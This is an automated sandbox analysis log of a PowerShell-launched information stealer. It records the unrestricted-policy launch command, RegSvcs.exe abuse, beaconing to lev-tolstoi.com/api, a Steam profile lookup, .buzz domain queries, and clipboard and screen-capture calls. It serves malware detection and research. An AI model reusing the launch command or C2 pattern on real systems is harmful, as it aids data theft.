Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: inherineau.buzz
Source: global traffic	DNS traffic detected: DNS query: prisonyfork.buzz
Source: global traffic	DNS traffic detected: DNS query: rebuildeso.buzz
Source: global traffic	DNS traffic detected: DNS query: scentniej.buzz
Source: global traffic	DNS traffic detected: DNS query: screwamusresz.buzz
Source: global traffic	DNS traffic detected: DNS query: appliacnesot.buzz
Source: global traffic	DNS traffic detected: DNS query: cashfuzysao.buzz
Source: global traffic	DNS traffic detected: DNS query: hummskitnj.buzz
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: powershell.exe, 00000000.00000002.2181917236.000002B3AD196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2181917236.000002B3AB7F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2181917236.000002B3AB5D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000004.00000002.2499270600.000000000114C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ACE6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2181917236.000002B3AB7F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2181917236.000002B3AB5D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2181917236.000002B3AB7F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2181917236.000002B3AC8B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: RegSvcs.exe, 00000004.00000002.2499832709.0000000001199000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: RegSvcs.exe, 00000004.00000002.2499771406.000000000118D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2499832709.0000000001199000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: powershell.exe, 00000000.00000002.2181917236.000002B3AD196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2202053582.000002B3BB75B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ACE6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2181917236.000002B3ACE6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: RegSvcs.exe, 00000004.00000002.2499500286.0000000001163000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2499771406.000000000118D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2499500286.000000000117B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegSvcs.exe, 00000004.00000002.2499771406.000000000118D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/Yi
Source: RegSvcs.exe, 00000004.00000002.2499500286.0000000001163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49714 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_00433E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00433E30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_00433E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00433E30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_004348C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

4_2_004348C2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD348940FA	0_2_00007FFD348940FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34893D05	0_2_00007FFD34893D05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD348941FA	0_2_00007FFD348941FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3489AA10	0_2_00007FFD3489AA10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34895590	0_2_00007FFD34895590
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34897DC8	0_2_00007FFD34897DC8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34893B4D	0_2_00007FFD34893B4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3489DB92	0_2_00007FFD3489DB92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34895FA0	0_2_00007FFD34895FA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34893FC5	0_2_00007FFD34893FC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040B100	4_2_0040B100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00408600	4_2_00408600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040C840	4_2_0040C840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041D003	4_2_0041D003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040D021	4_2_0040D021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040D83C	4_2_0040D83C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004038C0	4_2_004038C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042A0CA	4_2_0042A0CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004338D0	4_2_004338D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042C0E6	4_2_0042C0E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004160E9	4_2_004160E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041B8F6	4_2_0041B8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042C09E	4_2_0042C09E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041C8A0	4_2_0041C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004388B0	4_2_004388B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042C09E	4_2_0042C09E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00406160	4_2_00406160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041E960	4_2_0041E960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00418169	4_2_00418169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00405900	4_2_00405900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00426910	4_2_00426910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004281CC	4_2_004281CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004409E0	4_2_004409E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042C9EB	4_2_0042C9EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042E180	4_2_0042E180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043F18B	4_2_0043F18B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004291AE	4_2_004291AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004239B9	4_2_004239B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043CA40	4_2_0043CA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00435A4F	4_2_00435A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043DA4D	4_2_0043DA4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00404270	4_2_00404270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00411217	4_2_00411217
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041E220	4_2_0041E220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043FA20	4_2_0043FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00419AD0	4_2_00419AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004242D0	4_2_004242D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00439280	4_2_00439280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00439A80	4_2_00439A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00428ABC	4_2_00428ABC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040AB40	4_2_0040AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00421340	4_2_00421340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042D34A	4_2_0042D34A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042F377	4_2_0042F377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00409310	4_2_00409310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043FB10	4_2_0043FB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00418B1B	4_2_00418B1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043FB2A	4_2_0043FB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043FB28	4_2_0043FB28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040F3C0	4_2_0040F3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004283D8	4_2_004283D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041EB80	4_2_0041EB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00404BA0	4_2_00404BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00427440	4_2_00427440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043A440	4_2_0043A440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00440460	4_2_00440460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041747D	4_2_0041747D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00433C10	4_2_00433C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004204C6	4_2_004204C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004224E0	4_2_004224E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040D4F3	4_2_0040D4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00431CF0	4_2_00431CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00414CA0	4_2_00414CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042CD4C	4_2_0042CD4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042CD5E	4_2_0042CD5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00424560	4_2_00424560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043FD70	4_2_0043FD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00421D00	4_2_00421D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041051B	4_2_0041051B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00440D20	4_2_00440D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00411D2B	4_2_00411D2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00426D2E	4_2_00426D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00439D30	4_2_00439D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042C53C	4_2_0042C53C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00405DC0	4_2_00405DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043A5D4	4_2_0043A5D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004065F0	4_2_004065F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043CDF0	4_2_0043CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043C5A0	4_2_0043C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00437DA9	4_2_00437DA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00438650	4_2_00438650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042EE63	4_2_0042EE63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00420E6C	4_2_00420E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00422E6D	4_2_00422E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042FE74	4_2_0042FE74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0043FE00	4_2_0043FE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040F60D	4_2_0040F60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041961B	4_2_0041961B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041E630	4_2_0041E630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004246D0	4_2_004246D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004406F0	4_2_004406F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040E687	4_2_0040E687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00438EA0	4_2_00438EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00402EB0	4_2_00402EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041AEB0	4_2_0041AEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00427740	4_2_00427740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00412750	4_2_00412750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041DF50	4_2_0041DF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00416F52	4_2_00416F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00425F1B	4_2_00425F1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00429739	4_2_00429739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004157C0	4_2_004157C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00409780	4_2_00409780

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00414C90 appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00407F60 appears 40 times

Source: classification engine

Classification label: mal92.troj.evad.winPS1@6/5@10/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_00432070 CoCreateInstance,

4_2_00432070

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1ouyw53.ypu.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
